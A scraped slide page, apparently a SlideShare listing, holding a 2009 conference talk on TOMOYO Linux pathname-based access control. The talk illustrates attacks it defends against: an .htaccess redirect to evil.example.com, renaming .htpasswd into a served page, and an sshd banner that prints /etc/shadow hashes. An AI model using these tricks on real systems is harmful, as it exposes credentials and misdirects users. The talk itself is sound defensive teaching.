Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistandanishmna97
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfOrbitshub
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Orbitshub
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Bhuvaneswari Subramani
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Victor Rentea
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDropbox
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 

Último (20)

Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 

Deep inside TOMOYO Linux

  • 1. Copyright (C) 2009 NTT DATA CORPORATION Deep inside TOMOYO Linux Linux.Conf.Au 2009 2009.1.20 TOMOYO Linux Project Handa Tetsuo TOMOYO is a registered trademark of NTT DATA CORPORATION in Japan. Linux is a trademark of Linus Torvalds. Other names and trademarks are the property of their respective owners.
  • 2. Copyright (C) 2009 NTT DATA CORPORATION Two versions of TOMOYO Version 1.6.x Not using LSM. Full featured version. This material refers to this version. Supports many kernels/distributions including 2.4 kernels. Version 2.2.x Modified to use LSM for mainline inclusion. Proposal in progress. Minimal subset of 1.6.x . 1 2009.1.20
  • 3. Copyright (C) 2009 NTT DATA CORPORATION What is TOMOYO's argument? The "name" based access control has been unpopular among security professionals. Because whether a file is readable and/or writable and/or executable depends on the location of that file. But, we had better not to neglect the role of "name" in security. Or, we will get undesirable consequence. 2 2009.1.20
  • 4. Copyright (C) 2009 NTT DATA CORPORATION What is TOMOYO's argument? As long as a file's contents are stored in an inode, the contents could be separated/protected by "label" based access control. But when the contents are copied to userspace and mixed by applications, the "label" of the contents is lost. Thus, we should be aware with factors that control how the contents are processed. The "name" is one of such factors. 3 2009.1.20
  • 5. Copyright (C) 2009 NTT DATA CORPORATION What is TOMOYO's argument? Factors that affect security Program's code Files accessed by programs User's input Pathname (i.e. the location of a file) Command line arguments (a.k.a. argv[]) Environment variables (a.k.a. envp[]) and more? TOMOYO tries to care "name" factors. 4 2009.1.20
  • 6. Copyright (C) 2009 NTT DATA CORPORATION Scenario 1 : Customer's Demand We want to upload web contents via CGI/FTP/SFTP/TAR etc. Filename the administrator is expecting: /var/www/html/plaintext.txt Contents the administrator is expecting: Hello world! We want to let Apache serve the web contents. 5 2009.1.20
  • 7. Copyright (C) 2009 NTT DATA CORPORATION Scenario 1 : Question How can we avoid below case? Filename actually created: /var/www/html/.htaccess Contents actually written: RedirectMatch (.*) http://evil.example.com/cgi-bin/poison-it?$1 Apache will interpret .htaccess and return "302 Moved Temporarily" to clients. The clients will be redirected to malicious server. 6 2009.1.20
  • 8. Copyright (C) 2009 NTT DATA CORPORATION Scenario 1 : Question People are aware with cross site scripting vulnerability. It is an application level problem. Are people also aware with redirection vulnerability? http://isc.sans.org/diary.html?storyid=5150 It is an OS involved problem. Don't we have some rooms for protection? 7 2009.1.20
  • 9. Copyright (C) 2009 NTT DATA CORPORATION Scenario 1 : TOMOYO's Solution You can use "" (name subtraction operator) to avoid exercising unwanted pathnames. Only access controls which care "name" factor can do. Below is an example that doesn't allow creation of filename which begins with "." so that files like .htaccess won't be created. allow_create /var/www/html/. 8 2009.1.20
  • 10. Copyright (C) 2009 NTT DATA CORPORATION Scenario 2 : Customer's Demand We need to execute /bin/cat /bin/mv /bin/rm and some more commands from Apache's CGI. 9 2009.1.20
  • 11. Copyright (C) 2009 NTT DATA CORPORATION Scenario 2 : Question What happens if the CGI has a security hole that allows below operation? $ /bin/mv /var/www/html/.htpasswd /var/www/html/index.html Apache will interpret index.html and return the contents of .htpasswd (i.e. password information) to clients. The administrator won't want Apache to do so. 10 2009.1.20
  • 12. Copyright (C) 2009 NTT DATA CORPORATION Scenario 2 : TOMOYO's Solution Control what filenames are created/deleted/opened by the CGI. The "name" based access control can forbid use of inappropriate names. Change security context of a process whenever a program is executed. /bin/cat /bin/mv /bin/rm and some more commands will have different set of pathnames that are allowed to exercise. 11 2009.1.20
  • 13. Copyright (C) 2009 NTT DATA CORPORATION Scenario 3 : Customer's Demand We want to prevent administrator from blocking general users. 12 2009.1.20
  • 14. Copyright (C) 2009 NTT DATA CORPORATION Scenario 3 : Question What happens if the administrator issues the following operation? # ln /etc/resolv.conf /etc/nologin The administrator can prevent the general users from logging in, if the administrator is allowed to create a file named /etc/nologin . 13 2009.1.20
  • 15. Copyright (C) 2009 NTT DATA CORPORATION Scenario 3 : TOMOYO's Solution You can restrict what names the administrator and the general users can create/delete/rename/link. You can restrict namespace changes (e.g. mount/umount/chroot/pivot_root). 14 2009.1.20
  • 16. Copyright (C) 2009 NTT DATA CORPORATION Scenario 4 : Customer's Demand We want to divide administrator's tasks. We want to forbid operations that will leak /etc/shadow . # cat /etc/shadow Hey, there is a plenty room for criticizing "name" based access control! No, that’s not what I wanted to say here. 15 2009.1.20
  • 17. Copyright (C) 2009 NTT DATA CORPORATION Scenario 4 : Question We need to grant read access to /etc/shadow to applications which authenticate a user. /bin/login /bin/su /usr/sbin/sshd Then, why not consider "How /etc/shadow is used by such applications?" I'm talking about behaviors after the contents of /etc/shadow are copied to userspace. This is not a battle of "name" versus "label". 16 2009.1.20
  • 18. Copyright (C) 2009 NTT DATA CORPORATION Scenario 4 : Question Wow! Can you accept this? Using /etc/shadow as a banner. # /usr/sbin/sshd -o 'Banner /etc/shadow' # ssh localhost root:$1$d8kgaeX7$PqJEIeNsGAGPw4WwiVy0C/:14217:0:99999:7::: bin:*:14189:0:99999:7::: daemon:*:14189:0:99999:7::: adm:*:14189:0:99999:7::: lp:*:14189:0:99999:7::: sync:*:14189:0:99999:7::: shutdown:*:14189:0:99999:7::: (…snipped…) kumaneko:$1$Y1sTeizV$y59KJ5302WPGh9rw8kGU50:14217:0:99999:7::: root@localhost's password: 17 2009.1.20
  • 19. Copyright (C) 2009 NTT DATA CORPORATION Scenario 4 : TOMOYO's Solution You can control command line parameters and environment variables. Because they are factors that control how the contents are processed. Here are some examples. allow_execute /usr/sbin/sshd if exec.argc=1 allow_execute /bin/sh if exec.argc=3 exec.argv[1]="-c" exec.argv[2]="/bin/mail" exec.envp["PATH"]="/bin:/usr/bin" 18 2009.1.20
  • 20. Copyright (C) 2009 NTT DATA CORPORATION Scenario 5 : Customer's Demand We have to allow execution of /bin/sh from our server application. Parameters given to /bin/sh are variable, but we don't want to allow use of arbitrary parameters. We want to control not only commands but also command line parameters and environment variables. 19 2009.1.20
  • 21. Copyright (C) 2009 NTT DATA CORPORATION Scenario 5 : TOMOYO's Solution You can validate/record/detoxify parameters and do setup procedure (e.g. mounting private /tmp/ partition) using "execute_handler" keyword. Below example lets /usr/bin/check-cgi-param intercept program execution request. execute_handler /usr/bin/check-cgi-param 20 2009.1.20
  • 22. Copyright (C) 2009 NTT DATA CORPORATION Scenario 6 : Customer's Demand We want to assign different permissions based on client's IP address and/or port number. 21 2009.1.20
  • 23. Copyright (C) 2009 NTT DATA CORPORATION Scenario 6 : TOMOYO's Solution You can manage process's state using "task.state" keyword. allow_network TCP accept @network1 1024-65535 ; set task.state[0]=1 allow_network TCP accept @network2 1024-65535 ; set task.state[0]=2 22 2009.1.20
  • 24. Copyright (C) 2009 NTT DATA CORPORATION Scenario 7 : Customer's Demand We want to accept policy violation caused by software updates so that the service can restart properly after software updates. 23 2009.1.20
  • 25. Copyright (C) 2009 NTT DATA CORPORATION Scenario 7 : TOMOYO's Solution You can interactively handle policy violation in enforcing mode. To handle (library file's) pathname changes. To handle (irregular) signal requests. To examine whether the restarted service can work properly. 24 2009.1.20
  • 26. Copyright (C) 2009 NTT DATA CORPORATION Scenario 8 : Customer's Demand We want to protect our system from SSH brute force attacks. We can't use public key authentication because we are not allowed to use removable media. 25 2009.1.20
  • 27. Copyright (C) 2009 NTT DATA CORPORATION Scenario 8 : TOMOYO's Solution You can insert fully customizable extra authentication layer between the SSH server process and the login shell process. TOMOYO's process invocation history allows you to design process's state transition diagram. You can insert any setup programs into state transition diagram and enforce it. 26 2009.1.20
  • 28. Copyright (C) 2009 NTT DATA CORPORATION What versions can TOMOYO 1.6.x support? Vanilla kernels since 2.4.30/2.6.11. Many distributions' latest kernels. RedHat Linux 9 Fedora Core 3/4/5/6 Fedora 7/8/9/10 CentOS 3.9/4.7/5.2 Debian Sarge/Etch/Lenny OpenSUSE 10.1/10.2/10.3/11.0/11.1 Ubuntu 6.06/6.10/7.04/7.10/8.04/8.10 Asianux Server 2.0/3.0 Vine Linux 4.2 Nature’s Linux 1.6 Gentoo Hardened Gentoo Mandriva 2008.1/2009.0 Turbolinux Server 10/11 Turbolinux Client 2008 27 2009.1.20
  • 29. Copyright (C) 2009 NTT DATA CORPORATION Why TOMOYO 1.6.x doesn't use LSM? Not all hooks are provided. Minimal hooks for implementing TOMOYO 2.2.0 were merged in 2.6.28-git4 . TOMOYO needs more LSM hooks. Hooks for socket's accept()/recvmsg() operations. Hooks for non POSIX capability. Hooks for interactive enforcing mode. To support 2.4 kernels. 28 2009.1.20
  • 30. Copyright (C) 2009 NTT DATA CORPORATION Why TOMOYO 1.6.x doesn't use LSM? TOMOYO wants to coexist with other security mechanisms. We now understand unexpected "name" causes unexpected behaviors, don't we? Controlling only "label" is not sufficient. We need to also control "name". But current LSM is *exclusive*. I hope LSM will become stackable so that we can enable multiple LSM modules at the same time. 29 2009.1.20
  • 31. Copyright (C) 2009 NTT DATA CORPORATION Conclusion? The "name" based MAC is an inferior solution compared to the "label" based MAC if we care only whether a file is readable and/or writable and/or executable. But there are "name" specific advantages if we care other aspects in security. TOMOYO is a "name" based MAC which compensates for "label" based MAC's shortage. 30 2009.1.20
  • 32. Copyright (C) 2009 NTT DATA CORPORATION Materials? The role of "pathname based access control" in security. http://sourceforge.jp/projects/tomoyo/docs/lfj2008-bof.pdf "Why TOMOYO Linux?" http://sourceforge.jp/projects/tomoyo/docs/tlug200805.pdf All materials are available at http://sourceforge.jp/projects/tomoyo/docs/?category_id=532&language_id=1 31 2009.1.20